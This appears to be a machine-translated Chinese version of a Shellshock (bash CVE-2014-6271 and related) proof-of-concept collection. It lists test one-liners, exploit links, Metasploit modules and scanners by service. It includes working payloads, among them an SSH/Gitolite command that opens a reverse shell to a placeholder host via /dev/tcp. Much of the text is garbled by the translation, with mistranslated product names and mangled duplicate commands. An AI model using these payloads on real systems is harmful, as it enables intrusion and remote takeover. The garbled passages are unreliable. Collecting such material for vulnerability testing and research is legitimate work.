ShellShocker概念和潜在目标的证明集
维基百科链接:https://en.Wikipedia.org/wiki/Shellshock-28software-bug%29-CVE-2014-7186-u和CVE-2014-7187-u详细信息
如果您有更多链接或其他资源,请提交请求
推测:(未证实可能脆弱)
- XMPP(埃贾伯德)
- 邮递员-确认不易受攻击
- MySQL数据库
- NFS系统
- 活页夹9
- Procmail见
- 出口见
- Juniper Google Searchinurl:inurl:/dana na/auth/url_default/welcome.cgivia:https://twitter.com/notsosecure/status/516132301025984512via:http://kb.Juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
inurl:inurl:/dana-na/auth/url_default/welcome.cgi
- 网址:https://twitter.com/notsosecure/status/516132301025984512
- 网址:http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
- 思科Gearvia:http://tools.Cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-sa-20140926-bash
- 通过:http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
- 此处修补了FreePB/Asterix
如果您知道任何这些PoCs,请提交一个带有链接的问题或请求。
命令行(通过Cygwin的Linux、OSX和Windows)
- bashcheck-用于测试最新vuln的脚本
CVE-2014-6271
- env X='({:;};echo“CVE-2014-6271易受攻击”'bash-c id
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
CVE-2014-7169
将在cwd中创建一个名为echo的文件,其中包含日期(如果易受攻击)
- env X='(){(a)=>\'bash-c“echo日期”;cat echo
env X='() { (a)=>\' bash -c "echo date"; cat echo
CVE-2014-7186
- bash-c'true<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF<<EOF'| echo“CVE-2014-7186易受攻击,重拨堆栈”
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
CVE-2014-7187
- (对于x in{1..200};do echo“对于x$x in;do:”;done;对于x in{1..200};do echo done;done)| bash | | echo“CVE-2014-7187易受攻击,word|lineno”
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
CVE-2014-6278
- ENV X==============================================
env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
- 其他信息:http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
CVE-2014-6277
如果易受攻击,将segfault
- env X='(){X(){};X(){}<<a;}bash-c:
env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
- 关于全面披露的其他讨论:http://seclists.org/fulldisclosure/2014/Oct/9
- 其他信息:http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
IBM z/OS-
- http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-tolly-works-in-bash-on-z-os-和
超文本传输协议
- Metasploit攻击模块-Apache mod_cgi Bash环境变量代码注入(Shellshock)
- Metasploit利用模块-Advantech Switch Bash环境变量代码注入(Shellshock)
- Metasploit利用模块-IPFire Bash环境变量注入(Shellshock)
- HTTP Header pollution [email protected]://pastebin.com/QNkf7dYS
- HTTP CGI-BIN-HTTP://pastebin.com/166f8Rjx
- cPanel-http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-数千-of-cPanel-sites-are-high-risk.html
- 数字警报系统DASDEC-http://seclists.org/fulldisclosure/2014/Sep/107
- F5-https://twitter.com/securifybv/status/515035044294172673http://twitter.com/securifybv/status/515035044294172673/photo/1https://twitter.com/avalidnerd/status/515056358967508http://twitter.com/avalidnerd/status/515056463589675008/photo/1
- https://twitter.com/securifybv/status/515035044294172673/photo/1
- https://twitter.com/avalidnerd/status/515056358967508http://twitter.com/avalidnerd/status/51505646358967508/photo/1
- https://twitter.com/avalidnerd/status/515056358967508/photo/1
- Invisiblethreat.ca-https://www.Invisiblethreat.ca/2014/09/cve-2014-6271/
- 命令行版本-https://gist.github.com/mfadzilr/70892f43597e7863a8dc
- 带LiveHTTPHeaders的基于用户代理的演练-http://www.lykostech.net/lab-time-exploing-shellshock-bash-bug-virtual-server/
- 带Burp的基于用户代理的演练-http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
- 基于用户代理,但支持Tor和Socks5(Python)-https://github.com/lnxg33k/misc/blob/master/shellshock.py
- 基于Ruby的用户代理-https://github.com/securusglobal/BadBash
- 使用支持多线程的sleep的基于头的简单扫描仪-https://github.com/gry/shellshock-scanner
- shocker-对照已知易受攻击的CGI资源列表检查文件中的URL列表或单个URL(内容类型方法)
- 西蒙-https://lists.Xymon.com/archive/2014-09/040350.html
- QNAP-https://www.exploit-db.com/exploits/36503
Phusion乘客
- https://news.ycombinator.com/item?编号:8369776
DHCP协议
- 通过Tftpd32利用可信安全漏洞-https://www.Trusted sec.com/sember-2014/shellshock-dhcp-rce-proof-concept/
- Metasploit利用模块-Dhclient Bash环境变量注入(Shellshock)
- Metasploit辅助模块-https://github.com/rapid7/Metasploit-framework/blob/master/modules/Auxiliary/server/dhclient_bash_env.rb
- Perl脚本-http://pastebin.com/S1WVzTv9
- 使用Wi-Fi菠萝强迫人们加入网络-http://d.uijn.nl/?p=32个
宋承宪
- 堆栈溢出-http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploted-over-ssh
- SSH ForcedCommand-https://twitter.com/JZdziarski/status/51520558122123264https://twitter.com/JZdziarski/status/51520558122123264/photo/1
- https://twitter.com/JZdziarski/status/5152055811262264/photo/1
- SendEnv:LC_X='(){:;};echo易受攻击'ssh [email protected] SendEnv=LC_X
LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
- Gitolite-https://twitter.com/Grifo/status/5150899861766400$ssh [email protected]'(){ignore;}/bin/bash-i>&/dev/tcp/REVERSESHELLIP/PORT 0>&1'(服务器上必须有git帐户)
- $ssh [email protected]'({ignore;})/bin/bash-i>&/dev/tcp/REVERSESHELLIP/PORT 0>&1'
ssh [email protected] '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
- (必须在服务器上有git帐户)
OSX公司
- 通过VMware Fusion实现私有升级-https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/VMware_bash_function_root.rb
- 修复:http://support.apple.com/kb/DL1769
OSX-带反向DNS(CVE-2014-3671.txt)
- 示例区域文件:in-addr.arpa,其中包含CVE-2014-6271示例。
- 带有getnameinfo()并传递给setenv()的示例文件:osx rev ptr.c
- 上述CVE-2014-3671.txt说明的咨询
抿
- SIP代理:https://github.com/zaf/sipshock
Q邮件
- 详细演练-http://marc.info/?l=qmail&m=141183309314366&w=2
- 来自@ymzkei5的Tweet-http://twitter.com/ymzkei5/status/515328039765307392http://twitpic.com/ec3615http://twitpic.com/ec361o
- http://twitpic.com/ec3615
- http://twitpic.com/ec361o
后缀
- http://packetstormsecurity.com/files/128572/postfixmtp-shellshock.txt
文件传输协议
- 纯FTPd:https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
- Metasploit利用模块-纯FTPd外部身份验证Bash环境变量代码注入(Shellshock)
开放虚拟专用网
- OpenVPN-https://news.ycombinator.com/item?编号:8385332
- PoC演练@fj33r-http://sprunge.us/BGjP
甲骨文公司
- 受影响产品的警告和列表
TMNT公司
- https://twitter.com/SynAckPwn/status/514961810320293888/照片/1
手
- 通过@DJManilaIce-http://pastie.org/9601055
[email protected]:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \" __ __\n / V \ \n _ | | |\n / \ | | |\n | | | | |\n | | | | |\n | |__| | |\n | | \ |___|___\n | \ |/ \ \n | | |______ |\n | | | |\n | \__' / |\n \ \( /\n \ /\n \| |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
__ __
/ V \
_ | | |
/ \ | | |
| | | | |
| | | | |
| |__| | |
| | \ |___|___
| \ |/ \
| | |______ |
| | | |
| \__' / |
\ \( /
\ /
\| |
杯子
- Metasploit利用模块-CUPS Filter Bash环境变量代码注入
IRC公司
- Metasploit攻击模块-Xdh/LinuxNet Perlbot/fBot IRC Bot远程代码执行
- Metasploit利用模块-图例Perl IRC Bot远程代码执行
来自@primalsec的脚本
- shell_shocker.py-很适合与已知易受攻击的URL交互以传递命令(用户代理方法)
shell_shocker.py
- w3af_shocker.py-自动运行w3af spider/shell_shock scan的过程(用户代理方法)
w3af_shocker.py
- shell_sprayer.py-检查文件中的URL列表,或检查已知cgi bin资源列表中的单个URL(用户代理方法)
shell_sprayer.py